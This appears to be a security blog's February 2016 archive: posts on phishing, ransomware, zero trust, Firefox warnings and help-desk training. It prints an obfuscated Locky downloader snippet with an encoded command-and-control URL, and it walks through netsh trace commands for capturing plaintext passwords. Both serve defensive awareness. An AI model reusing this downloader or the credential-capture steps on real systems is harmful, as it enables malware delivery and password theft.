Monthly Archives: February 2016

TrojanDownloader:JS/Locky.A is a terribly piece of malware

27 February 2016

Outlook is definitely my favorite email app. If properly configured, spear phishing attacks can be easily detected – and so is it here.

Email with Locky Attachment

Email with Locky Attachment, click to enlarge.

Since the size of the attachment was too small to contain an image, I opened the zip file and found a java script version of Locky.A inside. As always most of the popular anti-malware scanners identified the malicious code after one day.

It’s always good to know the enemy. Therefore, I’ve put the code snippet, which downloads the payload from the Command & Control server, here:

try {
var    jsaykajS = '\u0052un';
/*  Translates into:  var    jsayjajS = 'Run'; */

wRXGXAa['\u006Fpe\u006E']('\u0047ET' , '\u0068\u0074\u0074\u0070:\u002F\u002F\u007A\u0061\u007Aa\u002D\u006B\u0079\u006A\u006F\u0076\u002E\u0063\u007A\u002F\u0073\u0079\u0073\u0074\u0065\u006D\u002F\u0063\u0061\u0063\u0068\u0065\u002F\u0038\u0037\u0068\u0037\u0035\u0034', false);
/* Translates into:  wRXGXAa['Open']('GET' ,'',false); */

/* Translates into: wRXGXAa['Send'] ();  */
lRJrL [jsaykajS](LWHEQOz, 1, false);
} catch (ajg9ggxFs) {};

It’s important to note that even small changes to the code cut the detection rate dramatically. Cyber criminals can create new versions easily because java script can be simply modified with notepad. With this classic anti-malware system have limited effect only.

How to deal with this challenge? First line of defense is as always user awareness training.

In addition, in-depth scanning of all incoming and outgoing emails is required. To be honest, I would recommend to strip off suspicious attachments (whatever scripts, executables, compressed files, old style office documents, xlsm, docm, pdf with embedded files etc. ) and notify the users of the protection measures taken.

Users will not be thrilled, but that’s much better than paying lots of money to cyber criminals or go out of business for a long time.

Have a good weekend, and take care.

Hollywood Presbyterian Medical Center Victim of Cyber Attack

20 February 2016

Hollywood Presbyterian Medical Center was hit by a ransomware attack around February 5th. At almost the same time some hospitals in Germany were hit by a similar attack.

In both cases the attack was initiated by emails with malicious attachments. In both cases the impact was nearly the same: Hospital operations came almost to halt. And in both cases the IT groups were able to prevent the worst by rapid and effective intervention.

IT operations, and thus medical operations, was massively hampered for some days because the malware rapidly changed its code. In such cases pattern based anti-malware systems have only a limited effect in recovery of IT operations.

From my point of view,  an effective ISMS is the best way to deal with ransomware. And the way the IT groups dealt with the attack shows, that they have an ISMS or something similar implemented and practiced.

Hospitals are becoming increasingly dependent on a fully operational IT infrastructure. Even a shutdown of some days is hardly possible. Therefore, we need an entirely new approach for providing services to hospital staff.

Spear phishing attacks, drive-by downloads, java script attacks, etc. are omnipresent today. Thus computers are potentially compromised because they are connected to the internet. This holds even if the computers are operated inside a company network only.

The ‘trusted computer in a trusted company network’ paradigm is no longer relevant. A shift to the ‘zero trust’ paradigm is imperative to prevent unacceptable outtakes.

The good news is that the technology for implementation of a ‘zero trust’ paradigm is ready today:

The hospital IT systems are isolated in a Core Data Services Network (CDSN). Access to the CDSN is provided via virtual desktops. The Virtual Desktop Infrastructure (VDI) is hosted in the CDSN.  Email- and internet access is blocked in the CDSN, as well as data exchange between the virtual desktops and the user workstations. Data exchange between the CDSN and the user workstations is controlled through secure gateways. Only the user workstations or smart devices have access to the internet and the company’s email system, which remains outside the CDSN.

This is just a blue print. With Software Defined Networking it’s easier to implement today.

The big advantage is that, even if a user’s workstation is compromised, the likelihood of an impact on the hospital’s IT systems and data in the CDSN is dramatically reduced. And recovery from an attack with ransomware is very easy: Run a fresh installation of Windows on the compromised computer. Sound’s easy, doesn’t it?

Have a good weekend.

New: Firefox warns of login forms on non-HTTPS pages

18 February 2016

Firefox has displayed security alerts in Browser Console since Firefox Version 26 when an URL with a password field was opened across an http link:

Password fields present on an insecure (http://) page. This is a security risk that allows user login credentials to be stolen.

This is a clear sign that your service provider does not care of security. Since the continuous back and forth between browser application and the console is really annoying, this function was rarely used.

With the latest Version 44 Firefox displays a notification in the URL bar if you open a URL with a password field across an unsecured HTTP connection.

For configuration:

  • Open URL about:config in Firefox
  • Approve the warning that you will be careful when changing settings.
  • Set the value of the security.insecure_password.ui.enabled preference to true if you want to be warned about non-secure login pages

With this Firefox displays a pad lock with a red slash if Firefox opens a page with password field across an insecured connection:

FireFox warns of password field on insecure page

Firefox warns of password field on insecure page

Take care, and enjoy the new security feature.

CNAP – a comprehensive approach to cyber security

15 February 2016

I really appreciate the comprehensive approach of the Cybersecurity National Action Plan (CNAP) because the news of the cyber-attack on the Department of Homeland security made one thing crystal clear:

It’s definitely not enough to focus on the upgrade of the U.S. IT security infrastructure. Security protocols must be reviewed and adjusted where necessary. And employees must be trained in their correct application.

Moreover, it is required to enable employees to say “No, I’m sorry, this is not allowed!” if an unambiguous identification of a caller is not possible.

Take care!

Rules for safe handling of electronic grid cards required to avoid cyber risks

13 February 2016

Electronic Grid Cards are often used for implementing strong or Two Factor Authentication. Although they offer lesser security than e.g. physical grid cards or authenticator apps, they are very popular because the rollout is easy: Just assign the grid card to the user in the authentication system, email the pdf document with the grid card, and off you go.

That sounds good, but without training in proper handling of the grid card this may end up in a security nightmare. Besides processes for e.g. blocking the grid card in the case of loss or theft, rules for proper handling need to defined and communicated to all users:

  • Print the grid card and store the printout in a safe place.
  • If required for convenient access, store the grid card on a secured mobile device.
  • Delete the email after print and empty the mail programs waste bin.
  • Delete the pdf document after print, make sure it is not cached or remains in the computers waste bin.
  • Do not note down passwords on the back of the grid card.

Please note that this list should not be considered as complete.

In particular copies on whatever online storage may pose a risk to a company. A cyber attacker who hijacked a computer may find the online copy and use it when requested to do so, e.g., for safe logon to the company’s web access portal.

Take care.

U.S. Department of Homeland Security hacked

9 February 2016

I was really shocked when I read the LIFARS post ‘Hacker Allegedly Dumps Data of 9,000 DHS Employees’ at 5:30 this morning.

It is very remarkable how easy it was for the attacker to get access to the DHS network:

“So I called up, told them I was new and I didn’t understand how to get past [the portal],” the hacker told the outlet. “They asked if I had a token code, I said no, they said that’s fine—just use our one.”

From this it’s apparent that the help desk hasn’t got enough training in the procedure for verification of a caller’s identity. In addition the passing-on of the token code is a massive violation of the security procedures.

Take care! And train the help desk staff…

Is your help desk prepared for this type of malware?

6 February 2016

Some variants of the W2KM_DRIDEX.BM trojan behave really strange if User Account Control (UAC) is set to the highest level ‘Always notify me’. In this case the malware attempts several times to elevate its own privileges. For a detailed description of the malware see post ‘Analysis of an Undetected Dridex Sample‘ in the REAQTA blog.

Although this behavior is really annoying everything went well so far. UAC did exactly what it was designed for: Notify the user that something requests higher privileges. Without approval by the user UAC blocks further execution, thus prevents Dridex from becoming persistent.

What next? In the best case, if the user cannot elevate the program, he calls the help desk. But is the help desk staff ready for this? What’s the proper response to this challenge?

The proper response is to quarantine the computer and disinfect the system. Or tell the user to keep calm, create an incident ticket and send it to the SOC.

The worst possible response would be to approve the request by entering the credentials of a privileged account. In this case Dridex starts over, becomes persistent and the attacker can start his malicious work.

Golden Triangle of IT Security

Golden Triangle of IT Security

IT security is created by a combination of people, processes and technology. Even if processes and technology complement each other perfectly, people may become the critical factor. In particular, if helpdesk staff turnover is high, awareness training and knowledge management become a major issue.

Have a good weekend.

netsh – The Cyber Attacker’s Tool of Choice

3 February 2016

For IT pros the Windows built-in command netsh is one of the tools of choice for troubleshooting network issues.

For a cyber attacker netsh is the tool of choice once he managed to get access to the company network. ‘netsh trace’ may be used to record every key stroke a user sends e.g. to the login dialog of web application or a banking application in plain text.

Using netsh trace is disturbingly easy:

[1] Start the recording session for programs connecting to internet services

netsh trace start scenario=InternetClient capture=yes tracefile=NetTrace-ICP.etl level=4

[2] Wait for the user to connect to a service …

[3] Stop the recording session

netsh trace stop

[4] Convert the trace file into readable format

netsh trace convert input=NetTrace-ICP.etl output=NetTrace-ICP.etl.xml dump=XML

[5] Open the file with notepad and search for the user name

<Data Name="RequestHandle">0xCC000C</Data>
<Data Name="Length">502</Data>
<Data Name="Headers">;passwd=-Plain-Text-Here-&amp;;……</Data>

Thus netsh trace can replace key loggers or tools like Mimikatz or Lazagne. Since the attacker must not reload utilities from the C&C server the likelihood of detection decreases.

Fortunately the attacker must run netsh trace in administrative context, but since many users always work in admin context this is not a real hurdle.

Apart from cyber attacks users should be concerned about privacy issues. If a support technician starts netsh in a remote troubleshooting session the likelihood is high that he may see your password or PIN. To prevent trouble users should always change their passwords after netsh was used to solve network issues.

Take care!